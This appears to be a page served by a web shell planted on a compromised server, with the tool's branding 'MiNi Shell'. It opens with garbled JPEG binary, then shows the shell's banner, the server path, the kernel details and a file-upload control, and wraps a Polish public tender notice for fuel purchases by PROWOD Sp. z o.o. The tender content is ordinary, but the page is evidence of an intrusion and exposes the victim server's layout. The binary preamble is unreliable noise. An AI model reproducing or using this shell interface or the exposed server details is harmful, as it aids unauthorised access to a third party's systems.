JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231122/0050245401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywny, bezgotówkowy zakup paliw płynnych dla PROWOD Sp. z o. o. w latach 2024-2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Prowod Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 530944564</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kup</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774691181 w. 33</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@prowod.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.prowod.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Usługi w zakresie zaopatrzenia w wodę i odprowadzenia ścieków, usługi komunalne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywny, bezgotówkowy zakup paliw płynnych dla PROWOD Sp. z o. o. w latach 2024-2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed555541-885e-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00502454</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/prowod <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/pn/prowod</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy OPEN NEXUS dostępnej pod adresem internetowym https://platformazakupowa.pl/pn/prowod. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla Wykonawcy na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej zamowienia@prowod.pl z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy<br/>użyciu platformy. Szczegółowy opis zawarto w pkt. 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w pkt. 22 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zawarto w pkt. 22 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/PROW/152/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywny, bezgotówkowy zakup paliw płynnych dla PROWOD Sp. z o. o. w latach 2023-2025, zgodnie z poniższym opisem:<br/>1.	W całym okresie realizacji zamówienia Zamawiający przewiduje zapotrzebowanie na olej napędowy w łącznej ilości 130 000 l oraz benzynę bezołowiową Pb 95 w łącznej ilości 12 000 l.<br/>2.	Wskazana powyżej przez Zamawiającego ilość paliwa stanowi jedynie ilość szacunkową, która może ulec zmianom (zarówno zmniejszeniom jak i zwiększeniom). Podane ilości zostały określone przez Zamawiającego na podstawie rzeczywistego zużycia paliw w zakładach Zamawiającego w okresie pełnych 12 m-cy (01.11.2022 – 31.10.2023) i odniesione do planowanego okresu obowiązywania umowy (24 m-cy). Zamawiający nie przewiduje zmniejszenia zakresu przedmiotu zamówienia o więcej niż 10% w odniesieniu do ilości podanych w pkt. 3.1.1. Wynagrodzenie dla Wykonawcy będzie płacone zgodnie z rzeczywistą ilością paliwa zatankowanego w danym okresie rozliczeniowym, z uwzględnieniem cen jednostkowych obowiązujących na dystrybutorze w dniu zakupu, po odliczeniu stałego rabatu, wskazanego w ofercie.<br/>3.	Wykonawca wystawi odpowiednią ilość kart bezgotówkowych na pojazdy wyznaczone przez Zamawiającego, uprawniające kierowców prowadzących pojazdy do tankowania na stacjach Wykonawcy oraz odpowiednią ilość kart paliwowych na okaziciela uprawniających do tankowania do kanistrów (łączna ilość kart to ok. 41 szt.). Zamawiający zastrzega możliwość zmiany pojazdów, a także ich liczby w trakcie obowiązywania umowy. Zamawiający wymaga, aby karty paliwowe zostały dostarczone do Biura Zarządu Zamawiającego przy ul. Janiny Kłopockiej 3, 45-920 Opole nie później, niż w ciągu 10 dni od daty zawarcia umowy z wybranym Wykonawcą.<br/>4.	W przypadku konieczności zamówienia w trakcie obowiązywania umowy dodatkowych kart paliwowych, Wykonawca zobowiązany jest na zgłoszenie Zamawiającego wyrobić takie karty i dostarczyć je bezpłatnie w terminie do 14 dni od otrzymania zgłoszenia.<br/>5.	Wykonawca zapewni sukcesywną dostawę paliw do pojazdów Zamawiającego polegającą na:<br/>1)	umożliwieniu bezpośredniego tankowania paliwa do zbiorników pojazdów samochodowych i kanistrów, <br/>2)	zakupie (tankowaniu) paliwa z dystrybutora na stacji paliw Wykonawcy, czynnej co najmniej od godziny 6.00 do 20.00 w dniach od poniedziałku do soboty, przy czym stacja paliw należąca do Wykonawcy powinna być usytuowana w odległości nie większej niż 10 km od siedziby Prowod Sp. z o. o. przy ul. Rynek 4, 46-082 Kup (licząc po najkrótszej trasie przebiegającej drogami publicznymi, dopuszczającymi ruch pojazdów o masie całkowitej powyżej 12 ton),<br/>3)	bezgotówkowej sprzedaży paliwa, która umożliwi prowadzenie przez Wykonawcę ewidencji zatankowanego paliwa dla poszczególnych pojazdów z podaniem daty i miejsca tankowania, ilości i wartości zakupionego paliwa, numeru rejestracyjnego pojazdu, który kierowca podaje przy zapłacie za zatankowane paliwo;<br/>4)	rozliczaniu rzeczywistej ilości zakupionego paliwa na podstawie kart bezgotówkowych w ustalonych w umowie okresach rozliczeniowych poprzez wystawianie faktur VAT płatnych przez Zamawiającego w ciągu 21 dni od daty wystawienia faktury VAT Zamawiającemu;<br/>5)	rozliczaniu za zakup oleju napędowego i benzyny bezołowiowej Pb 95 według ceny obowiązującej na stacjach paliw Wykonawcy z dnia zakupu, pomniejszonej o przyznany przez Wykonawcę stały rabat podany w ofercie.<br/>6.	Wykonawca zapewni, że dostarczane paliwo spełniać będzie wymogi jakościowe paliw ciekłych określone w Rozporządzeniu Ministra Gospodarki z dnia 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. z 2023r. poz. 1314).<br/>7.	Wykonawca wystawi jedną fakturę VAT zbiorczą dla każdego z dwóch zakładów prowadzonych przez Zamawiającego (w Opolu-Czarnowąsach i w Kup) za wszystkie transakcje jakie były zrealizowane w danym okresie rozliczeniowym. Wykonawca będzie wystawiał faktury za dany miesiąc dwukrotnie: od 1 do 15 dnia danego miesiąca, od 16 do ostatniego dnia danego miesiąca. Do faktury należy dołączyć zestawienie zawierające co najmniej następujące informacje: datę transakcji, rodzaj i ilość wydanego paliwa, nr rejestracyjny pojazdu. <br/>8.	Zamawiający Wymaga, aby Wykonawca niezależnie od decyzji o złożeniu faktur za zakupione paliwo w formie papierowej przekazywał każdorazowo Zamawiającemu niezwłocznie także faktury w formie elektronicznej (np. plik PDF). Przekazanie faktur w formie elektronicznej może odbyć się za pośrednictwem poczty elektronicznej na adres email: faktury@prowod.pl bądź też przez umożliwienie Zamawiającemu wglądu w odpowiedni system informatyczny Wykonawcy, w którym Zamawiający samodzielnie będzie mógł pobrać faktury. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09000000-3 - Produkty naftowe, paliwo, energia elektryczna i inne źródła energii</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oceniane będą tylko oferty niepodlegające odrzuceniu.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>2.1. Cena (C) w ujęciu brutto<br/>2.2. Upust cenowy (U) - oznacza rabat cenowy wyrażony w % uwzględniany każdorazowo przy zakupie paliw na stacji paliw Wykonawcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Upust cenowy (%)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na zasadach określonych w pkt. 8 SWZ. <br/>2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie: <br/>2.1.	zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa warunku, <br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada aktualną koncesję na prowadzenie działalności w zakresie obrotu paliwami ciekłymi wydaną na podstawie Ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. 2023 poz. 2023 ze zm.).<br/>2.3.	sytuacji ekonomicznej lub finansowej – Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100.000,00 PLN,<br/>2.4.	zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony jeśli Wykonawca posiada przynajmniej jedną stację paliw czynną przynajmniej od poniedziałku do soboty w godzinach co najmniej od 6:00 do 20:00, znajdującą się w odległości nie większej niż 10 kilometrów od siedziby Prowod Sp. z o. o. przy ul. Rynek 4, 46-082 Kup (licząc po najkrótszej trasie przebiegającej drogami publicznymi, dopuszczającymi ruch pojazdów o masie całkowitej powyżej 12 ton). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zawartość oferty - Oferta musi zawierać następujące oświadczenia i dokumenty (w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym):<br/>1.	wypełniony i podpisany formularz ofertowy sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SWZ,<br/>2.	wypełnione oświadczenie Wykonawcy zgodnie z załącznikiem nr 2 do SWZ,<br/>3.	wypełnione oświadczenie Podmiotu udostępniającego zgodnie z załącznikiem nr 3 do SWZ (jeśli dotyczy),<br/>4.	wypełnione i podpisane zobowiązanie innego podmiotu do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (załącznik nr 4 do SWZ) (jeśli dotyczy),<br/>5.	oświadczenie, z którego wynika, jakie dostawy lub usługi wykonają poszczególni wykonawcy (Załącznik nr 5 do SWZ) – w przypadku wykonawców wspólnie ubiegających się o zamówienie.<br/>6.	dokumenty, z których wynika prawo do podpisania oferty; tj. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej, odpowiednie pełnomocnictwa (jeżeli dotyczy), <br/>7.	dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie, pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (dotyczy jedynie Wykonawców wspólnie ubiegających się o zamówienie) (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą.<br/>2.	Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania, musi też wyliczać wszystkich wykonawców, którzy wspólnie ubiegają się o zamówienie. Każdy z tych Wykonawców musi podpisać się na dokumencie pełnomocnictwa. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4.	Oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu wg załącznika nr 2 do SWZ (art. 125 Ustawy Pzp) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokument ten potwierdza spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>5.	Każdy z Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu z postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw do wykluczenia składają samodzielnie wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>6.	Dokumenty potwierdzające spełnienie warunków udziału w postępowania, o których mowa w art. 125 ust. 1 Ustawy Pzp Wykonawcy składają tak, aby wykazać, że wspólnie spełniają warunki udziału w postępowaniu.<br/>7.	Spełnienie warunków udziału w postępowaniu oceniane będzie łącznie.<br/>8.	Podwykonawstwo:<br/>8.1.	Zamawiający nie zastrzega kluczowych zadań, które muszą być wykonane osobiście przez Wykonawcę.<br/>8.2.	Zamawiający żąda wskazania przez Wykonawcę w druku oferty (załącznik nr 1 do SWZ), części zamówienia, których wykonanie zamierza powierzyć Podwykonawcom i podania przez Wykonawcę firm podwykonawców, o ile są mu znane. Jeżeli wykonawca nie wskaże w ofercie, która część zamówienia zostanie powierzona podwykonawcy/-om Zamawiający uzna, iż Wykonawca nie powierza wykonania części zamówienia podwykonawcom.<br/>8.3.	Zamawiający nie weryfikuje podstaw wykluczenia w odniesieniu do podwykonawcy w zakresie art. 108 ust. 1 ustawy Pzp. Przewiduje się natomiast weryfikację podstaw wykluczenia względem podwykonawcy w zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian zostały opisane w projektowanych postanowieniach umownych stanowiących załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-29 11:05</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy zakupowej dostępnej pod adresem internetowym https://platformazakupowa.pl/pn/prowod</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-29 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie wymaga od wykonawcy złożenia żadnych podmiotowych środków dowodowych w zakresie wykazania braku podstaw do wykluczenia oraz spełnienia warunków udziału w postępowaniu. Dokumentem potwierdzającym brak podstaw do wykluczenia oraz spełnienie warunków udziału w postępowaniu będą oświadczenia, o których mowa w pkt. 9.1<br/>SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com